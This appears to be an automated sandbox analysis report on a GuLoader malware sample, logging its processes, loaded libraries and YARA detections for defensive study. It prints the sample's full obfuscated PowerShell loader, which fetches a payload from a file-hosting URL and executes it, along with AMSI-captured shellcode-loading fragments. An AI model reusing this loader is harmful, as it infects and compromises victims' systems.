              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Sulphuric = 1;$Plethorous='Sub';$Plethorous+='strin';$Plethorous+='g';Function hdrede($Blaastakkens){$Preflood=$Blaastakkens.Length-$Sulphuric;For($fstningsvrkers=5;$fstningsvrkers -lt $Preflood;$fstningsvrkers+=6){$Handelsstandsforenings251+=$Blaastakkens.$Plethorous.Invoke( $fstningsvrkers, $Sulphuric);}$Handelsstandsforenings251;}function Smrkers($Scooch){& ($Traguloidea) ($Scooch);}$Stikprop=hdrede 'HjlpeMNvninoKlip zBrothi Uds lDagsbl f,rmaKb.va/Nices5Woodb.Monas0 R.fl Ac.om(pladeWSuffoi Annon,loofddum,eo Arbew KilosCarpo ronNFemi TKingp Kloak1Lfted0Misst.Monop0Danto;Ste i Alg,rWO lsniLyksanMedio6Skatt4Anlgs;Unomn Overhx Prer6 Varm4Nivea; Pi,d Pol trDegrevPhth,:Overj1brai.2 Avar1.ands.Friti0Bedr.) Hore SkraaG TutmeSingacReseikG.ammoMrk s/F.gtf2T.len0Zenuw1Smmom0Pra.k0 ,ons1gldel0 etur1Sw pl VirgiFMateriTraa,r.rikteSk lafTitraoEriocx pre./No,il1Dilet2Tjrek1.esgs.L,sin0 Wool ';$Tudkoppernes=hdrede 'MoneyUFranksPrecieDa omrBanal- MajoA Lactg InapeUndern ignt eca ';$Loddendes=hdrede 'bela,hSambetBackhtSpattpFornusFarve: Exed/Agerj/Untanwhemi,wAntemw dapi.Preles,omiteFo,brnScrold AswisSin,lpModbyaS,mbicF ytteMod.v. Didecthu,do RivamSt,tu/Soldap dybhrhemogo rbe/UnchrdGkkerl De,t/Preafj.ostbjThrif4StinkuTauriw A,st4 Dyre ';$Gainyield=hdrede 'Pino,> orma ';$Traguloidea=hdrede ' LeeuiPhiloeCotylxBront ';$Sogneprst='Khediviah';$Indlaes = hdrede ' Ar.eeU derc Parahdir yo Ekss Geogl% Frdia LovtpDisorpFremtdSynf,a Uropt Kn.sa iara% I dp\te,esI MohanFolk.nFarmeuSensimNeur,eTrster NazaaSemi b BarnlMutone Swee.T,oppS AandnMacr.oFanta ,nder&Im.od&B adm UrosteFr,ntcAcleihA.gosoElvte SerietSe in ';Smrkers (hdrede 'Histo$Whispg Taknl Unr,o UntrbForbra WorklAbsal: MicrBGasrroDentagBi.enlRgerlr FortdEsslie PerssSatch=D.gdr(SylfecBaha,mSkambdTwadd ele/Aft,ec ,ugh Mis,m$SerosI UntenEntomdTrforlTendeadeporeDiktasSnupp)spoer ');Smrkers (hdrede ' Valu$daimigNonr l.egago,entebFe.icaMo ndlsvvef:ForveSOv rto StndmPrdikmSiwase offlrBl sdfNiveauMislagBaronlG.evdeAnatemN.ghto.ugledVenlieG wkilPopullZy,odekmninr,kabesFin.a=Forst$N.triLTagaso Bio.d Eos.dAg iceTransn.ankidO gaveOutw sFanga.ItalisDirtbpMelitlEderniforlst Subs(Amatr$SulfoGBrndsa OrgaiPet onUnlabySelvbiMa.iseMayollAlpetd Dagd) Ener ');$Loddendes=$Sommerfuglemodellers[0];$Lngerevarig= (hdrede 'Ironi$AfstegAnlgklOutseoDadleb IsotaindfalMaste:.krueP TrkkyDelberForniasjoven.noffoOver,iKataldBipro= Sug N MinueTilenwFilib- Ank,OUnmanb AclujbogleeFld,sc Reg,t Deba PresoSBelemyS grnsSkifttMagneeLegitm Udby.h.artNProfie Moustoutbo. Pa,tWFragme Skrib BertCRitualHoggii aurseDis,enSublit');$Lngerevarig+=$Boglrdes[1];Smrkers ($Lngerevarig);Smrkers (hdrede 'bomol$SansaPF.rveySt,derAnsteaPeriknFejlno.lempiConcadBalle.TilbyH Lo ieCorroa SpildRampiebrisarudspesFremt[ utte$SnkelTBa,keuKynu.dS ramkHelleo SignpPerspp LacteBasbarB whon Re,oeDepetsOrigi]Ha,rs=.rese$TandgSMachetCladoiA.stekSkribpEkster Virko Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Innumerable.Sno && echo t"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdatauser.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: version.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: avicap32.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msvfw32.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: Binary string: m.Core.pdb source: powershell.exe, 00000006.00000002.2614520211.000000000812D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.2611736999.0000000007092000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb_ source: powershell.exe, 00000006.00000002.2614520211.0000000008120000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdb source: powershell.exe, 00000006.00000002.2611736999.0000000007092000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: m.Core.pdb( source: powershell.exe, 00000006.00000002.2614520211.000000000812D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdbk source: powershell.exe, 00000006.00000002.2611736999.0000000007092000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.2614936555.0000000008173000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: CallSite.Targetore.pdb' source: powershell.exe, 00000006.00000002.2591214496.00000000029EC000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Yara detected GuLoader
              Source: Yara matchFile source: 00000006.00000002.2616022619.000000000A044000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.3357542132.0000000005144000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2615577920.0000000008440000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2609130468.000000000573F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.2834421548.0000024C677EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Found suspicious powershell code related to unpacking or dynamic code loading
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Conflate)$global:Amputees = [System.Text.Encoding]::ASCII.GetString($Albinoen)$global:Alvan=$Amputees.substring($Programpakke,$Leath)<#Prebendaryship Overrestrict Rebottle Exhumated
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Paaflge $Distingu $Drikningerne), (Expositing @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Palaquium = [AppDomain]::CurrentDomain.GetAssemblies()$global
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Afbinding)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Buccinatory, $false).DefineType($Solstrejf, $Bl
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Conflate)$global:Amputees = [System.Text.Encoding]::ASCII.GetString($Albinoen)$global:Alvan=$Amputees.substring($Programpakke,$Leath)<#Prebendaryship Overrestrict Rebottle Exhumated
              Suspicious powershell command line found
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Sulphuric = 1;$Plethorous='Sub';$Plethorous+='strin';$Plethorous+='g';Function hdrede($Blaastakkens){$Preflood=$Blaastakkens.Length-$Sulphuric;For($fstningsvrkers=5;$fstningsvrkers -lt $Preflood;$fstningsvrkers+=6){$Handelsstandsforenings251+=$Blaastakkens.$Plethorous.Invoke( $fstningsvrkers, $Sulphuric);}$Handelsstandsforenings251;}function Smrkers($Scooch){& ($Traguloidea) ($Scooch);}$Stikprop=hdrede 'HjlpeMNvninoKlip zBrothi Uds lDagsbl f,rmaKb.va/Nices5Woodb.Monas0 R.fl Ac.om(pladeWSuffoi Annon,loofddum,eo Arbew KilosCarpo ronNFemi TKingp Kloak1Lfted0Misst.Monop0Danto;Ste i Alg,rWO lsniLyksanMedio6Skatt4Anlgs;Unomn Overhx Prer6 Varm4Nivea; Pi,d Pol trDegrevPhth,:Overj1brai.2 Avar1.ands.Friti0Bedr.) Hore SkraaG TutmeSingacReseikG.ammoMrk s/F.gtf2T.len0Zenuw1Smmom0Pra.k0 ,ons1gldel0 etur1Sw pl VirgiFMateriTraa,r.rikteSk lafTitraoEriocx pre./No,il1Dilet2Tjrek1.esgs.L,sin0 Wool ';$Tudkoppernes=hdrede 'MoneyUFranksPrecieDa omrBanal- MajoA Lactg InapeUndern ignt eca ';$Loddendes=hdrede 'bela,hSambetBackhtSpattpFornusFarve: Exed/Agerj/Untanwhemi,wAntemw dapi.Preles,omiteFo,brnScrold AswisSin,lpModbyaS,mbicF ytteMod.v. Didecthu,do RivamSt,tu/Soldap dybhrhemogo rbe/UnchrdGkkerl De,t/Preafj.ostbjThrif4StinkuTauriw A,st4 Dyre ';$Gainyield=hdrede 'Pino,> orma ';$Traguloidea=hdrede ' LeeuiPhiloeCotylxBront ';$Sogneprst='Khediviah';$Indlaes = hdrede ' Ar.eeU derc Parahdir yo Ekss Geogl% Frdia LovtpDisorpFremtdSynf,a Uropt Kn.sa iara% I dp\te,esI MohanFolk.nFarmeuSensimNeur,eTrster NazaaSemi b BarnlMutone Swee.T,oppS AandnMacr.oFanta ,nder&Im.od&B adm UrosteFr,ntcAcleihA.gosoElvte SerietSe in ';Smrkers (hdrede 'Histo$Whispg Taknl Unr,o UntrbForbra WorklAbsal: MicrBGasrroDentagBi.enlRgerlr FortdEsslie PerssSatch=D.gdr(SylfecBaha,mSkambdTwadd ele/Aft,ec ,ugh Mis,m$SerosI UntenEntomdTrforlTendeadeporeDiktasSnupp)spoer ');Smrkers (hdrede ' Valu$daimigNonr l.egago,entebFe.icaMo ndlsvvef:ForveSOv rto StndmPrdikmSiwase offlrBl sdfNiveauMislagBaronlG.evdeAnatemN.ghto.ugledVenlieG wkilPopullZy,odekmninr,kabesFin.a=Forst$N.triLTagaso Bio.d Eos.dAg iceTransn.ankidO gaveOutw sFanga.ItalisDirtbpMelitlEderniforlst Subs(Amatr$SulfoGBrndsa OrgaiPet onUnlabySelvbiMa.iseMayollAlpetd Dagd) Ener ');$Loddendes=$Sommerfuglemodellers[0];$Lngerevarig= (hdrede 'Ironi$AfstegAnlgklOutseoDadleb IsotaindfalMaste:.krueP TrkkyDelberForniasjoven.noffoOver,iKataldBipro= Sug N MinueTilenwFilib- Ank,OUnmanb AclujbogleeFld,sc Reg,t Deba PresoSBelemyS grnsSkifttMagneeLegitm Udby.h.artNProfie Moustoutbo. Pa,tWFragme Skrib BertCRitualHoggii aurseDis,enSublit');$Lngerevarig+=$Boglrdes[1];Smrkers ($Lngerevarig);Smrkers (hdrede 'bomol$SansaPF.rveySt,derAnsteaPeriknFejlno.lempiConcadBalle.TilbyH Lo ieCorroa SpildRampiebrisarudspesFremt[ utte$SnkelTBa,keuKynu.dS ramkHelleo SignpPerspp LacteBasbarB whon Re,oeDepetsOrigi]Ha,rs=.rese$TandgSMachetCladoiA.stekSkribpEkster Virko Barnp G ne ');$Emplanes=
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Sulphuric = 1;$Plethorous='Sub';$Plethorous+='strin';$Plethorous+='g';Function hdrede($Blaastakkens){$Preflood=$Blaastakkens.Length-$Sulphuric;For($fstningsvrkers=5;$fstningsvrkers -lt $Preflood;$fstningsvrkers+=6){$Handelsstandsforenings251+=$Blaastakkens.$Plethorous.Invoke( $fstningsvrkers, $Sulphuric);}$Handelsstandsforenings251;}function Smrkers($Scooch){& ($Traguloidea) ($Scooch);}$Stikprop=hdrede 'HjlpeMNvninoKlip zBrothi Uds lDagsbl f,rmaKb.va/Nices5Woodb.Monas0 R.fl Ac.om(pladeWSuffoi Annon,loofddum,eo Arbew KilosCarpo ronNFemi TKingp Kloak1Lfted0Misst.Monop0Danto;Ste i Alg,rWO lsniLyksanMedio6Skatt4Anlgs;Unomn Overhx Prer6 Varm4Nivea; Pi,d Pol trDegrevPhth,:Overj1brai.2 Avar1.ands.Friti0Bedr.) Hore SkraaG TutmeSingacReseikG.ammoMrk s/F.gtf2T.len0Zenuw1Smmom0Pra.k0 ,ons1gldel0 etur1Sw pl VirgiFMateriTraa,r.rikteSk lafTitraoEriocx pre./No,il1Dilet2Tjrek1.esgs.L,sin0 Wool ';$Tudkoppernes=hdrede 'MoneyUFranksPrecieDa omrBanal- MajoA Lactg InapeUndern ignt eca ';$Loddendes=hdrede 'bela,hSambetBackhtSpattpFornusFarve: Exed/Agerj/Untanwhemi,wAntemw dapi.Preles,omiteFo,brnScrold AswisSin,lpModbyaS,mbicF ytteMod.v. Didecthu,do RivamSt,tu/Soldap dybhrhemogo rbe/UnchrdGkkerl De,t/Preafj.ostbjThrif4StinkuTauriw A,st4 Dyre ';$Gainyield=hdrede 'Pino,> orma ';$Traguloidea=hdrede ' LeeuiPhiloeCotylxBront ';$Sogneprst='Khediviah';$Indlaes = hdrede ' Ar.eeU derc Parahdir yo Ekss Geogl% Frdia LovtpDisorpFremtdSynf,a Uropt Kn.sa iara% I dp\te,esI 